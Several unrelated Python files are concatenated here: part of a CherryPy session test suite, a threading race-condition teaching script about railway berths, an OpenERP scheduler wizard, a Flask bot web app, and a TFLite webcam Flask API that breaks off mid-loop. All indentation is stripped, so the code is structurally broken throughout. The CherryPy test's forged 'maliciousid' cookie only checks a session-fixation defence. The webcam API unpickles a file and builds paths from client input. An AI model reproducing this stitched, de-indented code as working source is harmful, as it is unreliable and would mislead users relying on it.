# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertBody("{'aha': 'foo', 'counter': 3}")
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
self.getPage('/delete', cookieset1)
self.assertBody("done")
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self._test_Concurrency()
def test_2_File_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("FileSession")
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
path = os.path.join(localDir, "session-" + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/testStr',
headers=[
('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()),
set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail("The second session did not time out.")
else:
self.fail("Unknown session id in cache: %r", cache)
def test_8_Ram_Cleanup(self):
def lock():
s1 = sessions.RamSession()
s1.acquire_lock()
time.sleep(1)
s1.release_lock()
t = threading.Thread(target=lock)
t.start()
s2 = sessions.RamSession()
s2.clean_up()
self.assertEqual(len(sessions.RamSession.locks), 1, 'Clean up should not remove active lock')
t.join()
import socket
try:
import memcache # NOQA
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip("memcached not reachable ")
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.Sessions.MemcachedSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody("NotImplementedError")
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage("/", cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("memcached")
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(
404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
thread9.py
|
# Python Program Where Two Threads Are Acting On The Same Method To Allot A Berth For The Passenger
'''
Function Name : Two Threads Are Acting On The Same Method
Function Date : 5 Oct 2020
Function Author : Prasad Dangare
Input : String
Output : String
'''
from threading import*
from time import*
class Railway:
# Constructor That Accepts No Of Available Berths
def __init__(self, available):
self.available = available
# A Method That Reserves Berth
def reserve(self, wanted):
# Display No. Of Available Berths
print('Available no. of berths = ', self.available)
# If Available >= Wanted , Allot The Berth
if(self.available >= wanted):
# Find The Thread Name
name = current_thread().getName()
# Display Berth Is Allocated For The Person
print('%d berths allotted for %s' %(wanted, name))
# Make Time Delay So That The Ticket Is Printed
sleep(1.5)
# Decrease The No. Of Available Berths
self.available -= wanted
else:
# If Available < Wanted Then Say Sorry
print('Sorry , No Berths To Allot')
# Create Instance To Railway Class
# Specify Only Berth Is Available
obj = Railway(1)
# Create Two Thread And Specify 1 Berth Is Needed
t1 = Thread(target=obj.reserve, args=(1,))
t2 = Thread(target=obj.reserve, args=(1,))
# Give Names To The Thread
t1.setName('First Person')
t2.setName('Second Person')
# Run The Thread
t1.start()
t2.start()
|
schedulers_all.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import threading
from openerp import pooler
from openerp.osv import fields, osv
class procurement_compute_all(osv.osv_memory):
_name = 'procurement.order.compute.all'
_description = 'Compute all schedulers'
_columns = {
'automatic': fields.boolean('Automatic orderpoint',help='Triggers an automatic procurement for all products that have a virtual stock under 0. You should probably not use this option, we suggest using a MTO configuration on products.'),
}
_defaults = {
'automatic': lambda *a: False,
}
def _procure_calculation_all(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
proc_obj = self.pool.get('procurement.order')
#As this function is in a new thread, i need to open a new cursor, because the old one may be closed
new_cr = pooler.get_db(cr.dbname).cursor()
for proc in self.browse(new_cr, uid, ids, context=context):
proc_obj.run_scheduler(new_cr, uid, automatic=proc.automatic, use_new_cursor=new_cr.dbname,\
context=context)
#close the new cursor
new_cr.close()
return {}
def procure_calculation(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
threaded_calculation = threading.Thread(target=self._procure_calculation_all, args=(cr, uid, ids, context))
threaded_calculation.start()
return {'type': 'ir.actions.act_window_close'}
procurement_compute_all()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
app.py
|
import json
import threading
import logging
import os
import variables
from flask import Flask, jsonify, send_from_directory, request
from flask_cors import CORS
from chomps.chomps import initialize
from chomps.sheetsdecorator import SheetsDecorator
class WebChomps(object):
def __init__(self):
self.credentials_path = os.path.join('.', 'data', 'client_secret.json')
assert os.path.exists(self.credentials_path)
self.bot_id = variables.BOT_ID
self.debug = variables.DEBUG
self.web_port = variables.WEB_PORT
self.use_spreadsheet = variables.USE_SPREADSHEET
self.service_credentials = variables.SERVICE_CREDENTIALS
self.email_address = variables.EMAIL_ADDRESS
self.listening_port = variables.LISTENING_PORT
self.app = Flask(__name__, static_folder='react/build')
self.app.url_map.strict_slashes = False
self.spreadsheet = self.init_spreadsheet()
self.chomps_instance = initialize(bot_id=self.bot_id, debug=self.debug, use_spreadsheet=self.use_spreadsheet,
service_credentials=self.service_credentials)
threading.Thread(target=self.start_server)
def start_server(self):
self.chomps_instance.listen(port=self.listening_port) # Blocking call
def init_spreadsheet(self):
self.app.logger.info('Preparing to initialize stats spreadsheet')
spread = None
if os.path.exists(self.credentials_path):
spread = SheetsDecorator(load_spreadsheet=False, credentials=self.credentials_path)
spread.init_spreadsheet(email=self.email_address)
self.app.logger.info('Successfully created spreadsheet!')
else:
self.app.logger.error('Credentials file not found in path {}'.format(self.credentials_path))
return spread
web_chomps = WebChomps()
cors = CORS(web_chomps.app, resources={r'/api/*': {'origins': variables.ACCEPTED_ORIGINS}}, supports_credentials=True)
@web_chomps.app.route('/', defaults={'path': ''}, methods=['GET'])
@web_chomps.app.route('/<path:path>', methods=['GET'])
def serve(path):
# Serve React App
if path != '' and os.path.exists(web_chomps.app.static_folder + path):
message = 'Serving path: {}'.format(os.path.join(web_chomps.app.static_folder, path))
web_chomps.app.logger.info(message)
print(message)
return send_from_directory(web_chomps.app.static_folder, path)
else:
message = 'Serving path: {}'.format(os.path.join(web_chomps.app.static_folder, 'index.html'))
web_chomps.app.logger.info(message)
print(message)
return send_from_directory(web_chomps.app.static_folder, 'index.html')
@web_chomps.app.route('/api/context', methods=['GET', 'POST'])
def api_context():
canonical_names = web_chomps.chomps_instance.canonical_names
season_stats = web_chomps.chomps_instance.season_stats
response = jsonify({'names': canonical_names, 'season': season_stats})
response.status_code = 200
return response
@web_chomps.app.route('/api/table', methods=['GET', 'POST'])
def api_table():
context = web_chomps.chomps_instance.get_table_data()
response = jsonify(context)
response.status_code = 200
return response
@web_chomps.app.route('/api/players', methods=['POST'])
def api_players():
context = web_chomps.chomps_instance.nickname_map # GET STATS HERE AS DICT
response = jsonify({})
response.status_code = 200
return response
@web_chomps.app.route('/api/seasons', methods=['POST'])
def api_seasons():
context = web_chomps.chomps_instance.nickname_map # GET STATS HERE AS DICT
response = jsonify({})
response.status_code = 200
return response
@web_chomps.app.route('/api/teams', methods=['GET', 'POST'])
def api_teams():
request_json = request.get_json()
player_one = request_json.get('player1')
player_two = request_json.get('player2')
team_stats = web_chomps.chomps_instance.get_team_stats(player_one, player_two)
response = jsonify(team_stats)
response.status_code = 200
return response
if __name__ == '__main__':
logging_format = '%(asctime)s %(name)s [%(filename)s:%(lineno)d][%(process)d] [%(levelname)s] %(message)s'
debug = bool(web_chomps.debug)
port = int(web_chomps.web_port)
host = '0.0.0.0'
logging.basicConfig(level=logging.DEBUG if debug else logging.INFO, format=logging_format)
web_chomps.app.logger.info('Starting server on {host}:{port}. Debug: {debug}.'.format(host=host, port=port, debug=debug))
web_chomps.app.run(host=host, port=port, debug=debug, threaded=True)
|
TFLite_detection_webcam_api.py
|
#########################################
# Sensor Fusion API #
# (C) 2020 - De-Risking Strategies, LLC #
# DRS ML/AI Flask API #
# Authors: Pushkar K / Drew A #
# Updated 12-27-2020 #
#########################################
import os
import argparse
import config
import cv2 as cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
#Flask
import json
from flask import Flask, jsonify, request, render_template, Response, session, stream_with_context
from importlib import reload
import gc
import webbrowser
import pickle
from sfui import widgets #custom package
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 #Disable Flask Cache as it interferes with streaming
capture_image_limit = 2000
#Model Switcher
with open('/home/pi/SensorFusion/model.obj', 'rb' ) as input:
run_model = pickle.load(input)
os.environ['run_model'] = run_model
print("run_model "+ run_model)
#Client Commands
os.environ['labels_flag'] = 'labels_on'
#print('Init: ', os.environ.get('labels_flag'))
os.environ['scores_flag'] = 'scores_on'
#Capture
os.environ['cap_flag'] = 'False'
#kill_TF
os.environ['kill_tensorFlow'] = 'False'
#local var
fps_flag = False #showing frames per second is false by default - controlled by 'F' keyboard command
@app.route('/',methods=['GET'])
def index():
video_camera_flag = True
#On a reload
quit_flag = os.environ.get('quit_flag')
if quit_flag == 'quit':#
cv2.destroyAllWindows()
try:
if videostream:
#videostream.release()
videostream.stop()
except:
pass
return render_template('index.html' )
@app.route('/refresh_data')
def refresh_data():
#sfCallBack method that sends data to the javascript poller in data.js
sfCommand = request.args.get('command')
print("sfCallBack: ", sfCommand)
if sfCommand == "s": #save file
os.environ['fileIndex_flag'] = 0
print('Setting FileIndex_Flag')
#Get the File index from the save command
file_save_id = 1
return str(file_save_id)
@app.route('/api', methods = ['GET','POST'])
def api():
# POST request - Sensor Fusion Commands
if request.method == 'POST':
print('Incoming command from Sensor Fusion client ...')
sfCommand = request.get_json()
print(sfCommand) # parse as JSON
first_char = sfCommand[0]
if first_char == 'a':
chunks = sfCommand.split(',')
sfCommand = 'annotate'
#Get the annotation data - name, image count, description
os.environ['annotate_name'] = str(chunks[1])
os.environ['annotate_images'] = str(chunks[2])
global anno_images
anno_images = str(chunks[2])
#kill TensorFlow
if first_char == 'k':
os.environ['kill_tensorFlow'] = 'True'
#Restore Tensor Flow
if first_char == 'r':
os.environ['kill_tensorFlow'] = 'False'
#print('Restore Tensor Flow')
#Custom model changed -
if first_char == 'c':
chunks = sfCommand.split(",")
model_changed_to = str(chunks[1])
print('Custom Model changed to: '+model_changed_to)
filehandler = open('model.obj','wb')
pickle.dump(model_changed_to,filehandler)
filehandler.close()
os.environ['run_model'] = model_changed_to
#rerun
os.environ['quit_flag'] = 'quit'
#PreLoaded model changed
if first_char == 'm':
chunks = sfCommand.split(",")
model_changed_to = str(chunks[1])
print('PreLoaded Model changed to: '+model_changed_to)
filehandler = open('model.obj','wb')
pickle.dump(model_changed_to,filehandler)
filehandler.close()
os.environ['run_model'] = model_changed_to
#rerun
os.environ['quit_flag'] = 'quit'
#Check if directory exists
if first_char == 'd':
print('check if directory exists')
chunks = sfCommand.split(",")
global annotatePath
annotatePath = '/home/pi/SensorFusion/Pictures/'+ str(chunks[1])
print('Py Checking Path: ',annotatePath)
isDir = os.path.exists(annotatePath)
print('Dirctory checked isDir'+ str(isDir))
if isDir:
message = {'statusText':'true'}
print('Dirctory Exists')
return 'Forbidden', 403
else:
message = {'statusText':'false'}
print('Directory Does not Exist')
return 'OK', 200
#Annotate
if sfCommand == 'annotate':
capture_flag = os.environ['cap_flag'] = 'True'
print('Capture Flag Command =',capture_flag)
#Labels
elif sfCommand == 'scores_off':
os.environ['scores_flag'] = sfCommand
print('Toggle Scores Command =', os.environ['scores_flag'])
elif sfCommand == 'scores_on':
os.environ['scores_flag'] = sfCommand
print('Toggle Scores Command =', os.environ['scores_flag'])
elif sfCommand == 'labels_off':
os.environ['labels_flag'] = sfCommand
print('Toggle Labels Command =', os.environ['labels_flag'])
elif sfCommand == 'labels_on':
os.environ['labels_flag'] = sfCommand
print('Toggle Labels Command =', os.environ['labels_flag'])
elif sfCommand == 'fps':
global fps_flag#local scope
if fps_flag == False:#Show/Hide Frames per second
fps_flag = True
else:
fps_flag = False
elif sfCommand == 'quit':
os.environ['quit_flag'] = sfCommand
print('Quit command recieved')
return 'OK', 200
# GET request
else:
print('GET Request from Client')
#session['cap_flag'] = True
#print(session.get('capt_flag'))
os.environ['cap_flag'] = 'True'
print('Capture Flag Command =', os.environ['cap_flag'])
message = {'Capture':'Capturing Images!'}
return jsonify(message) # serialize and use JSON headers
@app.route('/login')
def login():
embedVar='Login'
return render_template('login.html',embed=embedVar )
@app.route('/register')
def register():
embedVar='Register'
return render_template('register.html',embed=embedVar )
@app.route('/video_feed')
def video_feed():
#Video streaming route: goes into src attribute of an img tag
print('\nin FLASK: locals() value inside class\n', locals())
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
# ============================
def gen_frames():
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream(object):
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30,target=None,args=()):
global capture_image_limit
capture_image_limit = 2000
global file_save_id
file_save_id =0
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
#VideoStream Instance
instance = VideoStream.__qualname__
print('The class instance is: ',instance)
#print('\nVIDEOSTREAM: locals() value inside class\n', locals())
#print(dir(VideoStream))
#Reload
reloadClass = os.environ.get('reload')
if reloadClass == 'True':
print('Delete Self:')
del self
os.environ['reload'] = 'False'
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def __del__(self):
print ("Object destroyed");
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
this_instance = self
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
args = parser.parse_args()
MODEL_NAME = args.modeldir
print('~~~~ Param Default Model Name: ' + str(MODEL_NAME))
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
print('TPU Runtime' + str(pkg))
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
# Multi-Model
# Demo90 /home/pi/SensorFusion/Demo90
# Deer: /home/pi/SensorFusion/PreLoadedModels/Model01.Deer
# Head: /home/pi/SensorFusion/PreLoadedModels/Model02.Head
# Eyes: /home/pi/SensorFusion/PreLoadedModels/Model03.Eyes
# Tree: /home/pi/SensorFusion/PreLoadedModels/Model04.Tree
# check.id - cd /home/pi/SensorFusion/checkid
CWD_PATH = os.getcwd()
print("Default Path: "+ CWD_PATH)
newModel = str(os.environ.get('run_model'))
print("New Model Name: "+ newModel)
if newModel == "Demo90":
CWD_PATH = "/home/pi/SensorFusion/"+ newModel
elif newModel == 'Check.ID':
CWD_PATH = "/home/pi/SensorFusion/checkid"
else:
CWD_PATH = "/home/pi/SensorFusion/PreLoadedModels/"+ newModel
print("Current Model Path: "+ CWD_PATH)
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
print("Current Path to Label Map: "+ PATH_TO_LABELS)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
#if video_camera_flag:#Using a Flag here - for future use
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print('TPU Detected' + PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
print('No TPU detected!'+ PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
global img_counter
img_counter = 0
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
try:
while True:
#while video_camera_flag:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
global frame
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
person_found = False
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
#num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
#Kill TensofFlow while Annotating
kill_tensorFlow = os.environ.get('kill_tensorFlow')
#print("TensofFlow Status: " + str(kill_tensorFlow))
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
#print("Kill TF Flag: "+ str(kill_tensorFlow))
if kill_tensorFlow != 'True':
try:
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 3)
except:
pass
# Draw label (object_name) and score (%)
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
#print(labels[int(classes[i])]+": "+str(i))
if labels[int(classes[0])]== 'person':#NOTE - The bar is for one person only
#print('Person Found!')
person_found = True# used for bar below
scores_flag = os.environ.get('scores_flag')
labels_flag = os.environ.get('labels_flag')
#states
state_ = 11 #both on by default
if labels_flag == 'labels_off' and scores_flag == 'scores_off':
state_ = 0#00
label = object()
if labels_flag == 'labels_on' and scores_flag == 'scores_on':
state_ = 11#11
label = '%s: %d%%' % (object_name.capitalize(), int(scores[i]*100)) # Example: 'person: 72%'
if labels_flag == 'labels_off' and scores_flag == 'scores_on':
label = '%d%%' % (int(scores[i]*100)) # Example: '72%'
state_ = 1#01
if labels_flag == 'labels_on' and scores_flag == 'scores_off':
state_= 10 #10
label = '%s: ' % (object_name.capitalize()) # Example: 'person: '
#draw the labels, background score and box
if state_ != 0:
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
#cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (237,237,237), cv2.FILLED) # Draw white box to put label text in
if kill_tensorFlow != 'True':
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (128,128,128), cv2.FILLED) # Draw gray box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2) # Draw label text
else:
if kill_tensorFlow != 'True':
cv2.rectangle(frame, (xmin,ymin), (xmin,ymin), (237,237,237), cv2.FILLED) # Draw frame with no label OR score text !
# Draw framerate in corner of frame - use 'F' key to toggle on/off
try:
if fps_flag:
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
else:
pass
except:
pass
#If Capture Image Draw status text
capture_flag = os.environ.get('cap_flag')
try:
if capture_flag == "True":
cv2.putText(frame,'Saving File: '+str(img_counter),(520,50),cv2.FONT_HERSHEY_SIMPLEX,0.6,(0,0,255),2)
else:
pass
except:
pass
# All the results have been drawn on the frame, so it's time to display it.
#cv2.imshow('Object detector', frame) ## Commented for the FLASK API
#Module widgets.meter()
if kill_tensorFlow != 'True':
#window_name ='Object detector'
top = int(scores[0]*100)
color = (0,0,255)
if person_found == True:
widgets.meter(frame,top)#module
#End Module
# Displaying the image - DO NOT USE!
#cv2.imshow(window_name, image)
